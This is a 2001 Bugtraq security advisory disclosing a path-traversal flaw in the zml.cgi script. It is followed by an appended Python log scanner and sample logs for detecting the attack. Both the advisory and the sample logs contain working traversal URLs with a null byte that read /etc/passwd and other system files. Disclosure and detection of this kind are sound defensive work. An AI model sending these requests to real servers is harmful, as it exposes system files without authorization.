[23659] in bugtraq


blackshell2: zml.cgi remote exploit

daemon@ATHENA.MIT.EDU (blackshell@hushmail.com)
Mon Dec 31 11:43:13 2001

Message-Id: <200112310804.fBV84Ki18990@mailserver2a.hushmail.com>
From: blackshell@hushmail.com
To: bugtraq@securityfocus.com
Cc: vuln-dev@hotmail.com, vulnwatch@vulnwatch.org
Date: Mon, 31 Dec 2001 00:04:20 -0800


-----BEGIN PGP SIGNED MESSAGE-----

#####################################################
#--blackshell security advisory no2--#		    #
#--zml.cgi remote exploit--#			    #
#####################################################

########################
vendor details & history
########################

zml.cgi for webservers
by jero.cc

http://www.jero.cc/zml/zml.html

##################
details of exploit
##################

this is a classic CGI bug which uses ../../../../ to read remote files.

example:

http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/fstab%00
http://www.blackshell.com/cgi-bin/zml.cgi?file=../../../../../../../../../etc/motd%00

this may be used by the attacker to gather vital details about the remote server.

###
fix
###

remove this script from your webserver

####
note
####

this test was conducted on an apache box, and a redhat server.
under no circumstances are we liable for any misuse of this
information

########
hi's to:
########

blackshell dev team, #!blackshell contributors and anyone who
over the years has helped us make us what we are

#######
contact
#######

blackshell@hushmail.com

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl8EARECAB8FAjwwHhcYHGJsYWNrc2hlbGxAaHVzaG1haWwuY29tAAoJED2VGGGCU8ut
bHgAn28OCJjLmUCrk+sePY5ukAfYfopJAJ0Y54Te+w7HIVwXeUdSGt1PmPuTAA==
=yPg1
-----END PGP SIGNATURE-----
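
The request pattern described in the advisory (`../` sequences and a trailing `%00` in the `file` parameter of zml.cgi) can be searched for in web server access logs. The following is an added example, not part of the original advisory or the zml.cgi project; it assumes Apache common/combined log format, and the sample log lines, addresses and the `index.zml` file name are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address, request target and status from an Apache common/combined log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Reasons a `file` value matches the advisory's pattern (empty list = clean)."""
    value = fully_decode(value)
    reasons = []
    if ".." in re.split(r"[\\/]+", value):  # any path segment that is exactly ".."
        reasons.append("traversal")
    if "\x00" in value:                     # decoded %00
        reasons.append("nul-byte")
    return reasons

def scan(lines, script="zml.cgi", param="file"):
    """Return (ip, status, reasons) for each suspicious request to the script."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.rsplit("/", 1)[-1] != script:
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify(value) if key == param else []
            if reasons:
                findings.append((m["ip"], int(m["status"]), reasons))
    return findings

# Constructed sample log lines (documentation addresses, hypothetical file names).
SAMPLE = [
    '192.0.2.10 - - [31/Dec/2001:11:40:02 -0800] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1432',
    '192.0.2.11 - - [31/Dec/2001:11:41:10 -0800] "GET /cgi-bin/zml.cgi?file=index.zml HTTP/1.0" 200 5120',
    '192.0.2.12 - - [31/Dec/2001:11:42:30 -0800] "GET /cgi-bin/zml.cgi?file=..%2f..%2fetc%2fmotd HTTP/1.0" 404 210',
    '192.0.2.13 - - [31/Dec/2001:11:43:00 -0800] "GET /index.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, ",".join(reasons))
```

A flagged request that returned status 200 deserves priority, since the script answered it rather than rejecting it.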

